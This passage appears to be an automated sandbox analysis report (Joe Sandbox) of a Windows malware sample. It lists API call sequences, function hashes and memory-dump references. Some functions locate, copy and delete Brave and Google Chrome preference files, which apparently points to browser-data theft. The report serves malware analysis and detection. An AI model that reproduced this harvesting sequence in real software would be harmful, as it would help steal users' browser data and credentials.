6b8d41-6b8d46 call 6a2a20 2919->2937 2920->2906 2932 6b8e66-6b8e6d 2920->2932 2921->2922 2955 6b8eb3-6b8eb5 2922->2955 2924->2906 2925->2906 2926->2906 2927->2906 2928->2906 2929->2955 2930->2929 2931->2906 2932->2906 2933->2906 2934->2935 2935->2955 2936->2955 2937->2936 2940->2904 2955->2906 2956 6b8eb7-6b8eb9 2955->2956 2956->2906 2957 6b8ebb-6b8ebd lstrcpy 2956->2957 2957->2906
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 589377fdc6016be49b7db14f922b4b71750e24d105bfd06e0e416559becfb979
                                • Instruction ID: b0dd9e1560f9caaec48c4c2aa9abb1ea7b4785a54a024ba2437ce00d4044da2f
                                • Opcode Fuzzy Hash: 589377fdc6016be49b7db14f922b4b71750e24d105bfd06e0e416559becfb979
                                • Instruction Fuzzy Hash: 47E0D8A0500349EBDB007FB5DCC49C67B6CFF84710B048529ED455B256EB749D00C764
                                Function 006C2AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2958 6c2ad0-6c2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 6c2b44-6c2b59 2958->2959 2960 6c2b24-6c2b36 2958->2960
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 006C2AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C2B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 006C2B1A
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 58cbfc52cd059cffdd70c32bc8f14e796c2e4c17f4079f824dee9337c0b75bed
                                • Instruction ID: 89b85ab78da7a999d19be1147ae5d19a831725a42245dfbb55519b6718c14312
                                • Opcode Fuzzy Hash: 58cbfc52cd059cffdd70c32bc8f14e796c2e4c17f4079f824dee9337c0b75bed
                                • Instruction Fuzzy Hash: 6701D172A45648ABC710DF99EC45BAEFBB8F744B21F00026BF919E3780D7741D0087A1
                                Function 008F0E62 Relevance: 1.3, APIs: 1, Instructions: 17memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000), ref: 008F0FA8
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: d1fe9645521ccc85f1ebad97aa66e2d29f9be09a588b7749bdbc468c249518bf
                                • Instruction ID: 2a198149b50d6a1d7e69391d9016b5c090d27b4c127458a30f6e28ef7787ea04
                                • Opcode Fuzzy Hash: d1fe9645521ccc85f1ebad97aa66e2d29f9be09a588b7749bdbc468c249518bf
                                • Instruction Fuzzy Hash: 90D05EF020C70CAFE3546E159C05BBF76E8EB84701F10802CDB4186A82F9700C14C9AA

                                Non-executed Functions

                                Function 006B2390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B2402
                                • lstrlen.KERNEL32(\*.*), ref: 006B240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006B2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B2486
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 501f89fcaab5f3409c6989803bf07df05dd94d8b1ea11a57f908e41b82bd624b
                                • Instruction ID: 40e5d119917fa0c323daf0a290bd48741464fd51afaf74e739099aa7101178ef
                                • Opcode Fuzzy Hash: 501f89fcaab5f3409c6989803bf07df05dd94d8b1ea11a57f908e41b82bd624b
                                • Instruction Fuzzy Hash: F1A28EB1A11617ABCB21AF69DCA8AEE77BABF05700F044169F84997311DB34DD818F90
                                Function 006A16A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A16E2
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A176C
                                • lstrcat.KERNEL32(00000000), ref: 006A1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A17A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A17EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A17F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1875
                                • lstrcat.KERNEL32(00000000), ref: 006A187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A18AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A18FE
                                • lstrlen.KERNEL32(006D1794), ref: 006A1909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1929
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1966
                                • lstrlen.KERNEL32(\*.*), ref: 006A1971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006A199A
                                  • Part of subcall function 006C4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 006C406D
                                  • Part of subcall function 006C4040: lstrcpy.KERNEL32(00000000,?), ref: 006C40A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A19C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1A16
                                • lstrlen.KERNEL32(006D1794), ref: 006A1A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1A41
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1A81
                                • lstrlen.KERNEL32(006D1794), ref: 006A1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1AAC
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006A1B45
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006A1B70
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006A1B8A
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A1BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1C03
                                • lstrlen.KERNEL32(006D1794), ref: 006A1C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1C31
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1C74
                                • lstrlen.KERNEL32(006D1794), ref: 006A1C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1CA2
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1CAE
                                • lstrlen.KERNEL32(?), ref: 006A1CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 006A1CE9
                                • lstrlen.KERNEL32(006D1794), ref: 006A1CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1D14
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1DEB
                                • lstrlen.KERNEL32(006D1794), ref: 006A1DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1E19
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A1E56
                                • lstrlen.KERNEL32(006D1794), ref: 006A1E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1E81
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A1E8D
                                • lstrlen.KERNEL32(?), ref: 006A1E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 006A1EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A1F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006A1F45
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A1F9F
                                • lstrlen.KERNEL32(01339358), ref: 006A1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 006A1FE3
                                • lstrlen.KERNEL32(006D1794), ref: 006A1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A200E
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A204D
                                • lstrlen.KERNEL32(006D1794), ref: 006A2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A2075
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006A2081
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: 0fac0964069c3653757c3c8bb392b85e8079d94d07c0fb1d7ab81e952b20cf5f
                                • Instruction ID: 4d8f38e742a9cbfd88f421797d9455fb42ca7fafddc72650156577163a89fbf0
                                • Opcode Fuzzy Hash: 0fac0964069c3653757c3c8bb392b85e8079d94d07c0fb1d7ab81e952b20cf5f
                                • Instruction Fuzzy Hash: 45926071A416179BCB21BF69DD98AEE77BBBF06700F044169F909AB211DB34DD018FA0
                                Function 006ADB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADBEF
                                • lstrlen.KERNEL32(006D4CA8), ref: 006ADBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADC17
                                • lstrcat.KERNEL32(00000000,006D4CA8), ref: 006ADC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADC4C
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADC8F
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006ADCD0
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006ADCF0
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006ADD0A
                                • lstrlen.KERNEL32(006CCFEC), ref: 006ADD1D
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006ADD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADD7B
                                • lstrlen.KERNEL32(006D1794), ref: 006ADD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADDA3
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADDAF
                                • lstrlen.KERNEL32(?), ref: 006ADDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 006ADDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADE19
                                • lstrlen.KERNEL32(006D1794), ref: 006ADE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006ADE6F
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADE7B
                                • lstrlen.KERNEL32(01339218), ref: 006ADE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADEBB
                                • lstrlen.KERNEL32(006D1794), ref: 006ADEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 006ADEE6
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADEF2
                                • lstrlen.KERNEL32(01339398), ref: 006ADF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADFA5
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006ADFB1
                                • lstrlen.KERNEL32(01339218), ref: 006ADFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006ADFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006ADFF4
                                • lstrlen.KERNEL32(006D1794), ref: 006ADFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE022
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006AE02E
                                • lstrlen.KERNEL32(01339398), ref: 006AE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006AE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 006AE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 006AE0E7
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AE11F
                                • lstrlen.KERNEL32(0133D7E0), ref: 006AE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE155
                                • lstrcat.KERNEL32(00000000,?), ref: 006AE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE19F
                                • lstrcat.KERNEL32(00000000), ref: 006AE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006AE1F9
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AE22F
                                • lstrlen.KERNEL32(01339358), ref: 006AE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE261
                                • lstrcat.KERNEL32(00000000,01339358), ref: 006AE269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 006AE274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 006AE2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE349
                                • DeleteFileA.KERNEL32(?), ref: 006AE381
                                • StrCmpCA.SHLWAPI(?,0133D750), ref: 006AE3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE445
                                • StrCmpCA.SHLWAPI(?,01339398), ref: 006AE468
                                • StrCmpCA.SHLWAPI(?,01339218), ref: 006AE47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 006AE4E0
                                • StrCmpCA.SHLWAPI(?,0133D7B0), ref: 006AE58E
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006AE5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 006AE639
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE678
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE6C7
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE70E
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE737
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE75C
                                • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 006AE776
                                • DeleteFileA.KERNEL32(?), ref: 006AE7D2
                                • StrCmpCA.SHLWAPI(?,013392B8), ref: 006AE7FC
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE88C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE8B5
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE8EE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006AE916
                                • lstrcpy.KERNEL32(00000000,?), ref: 006AE952
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
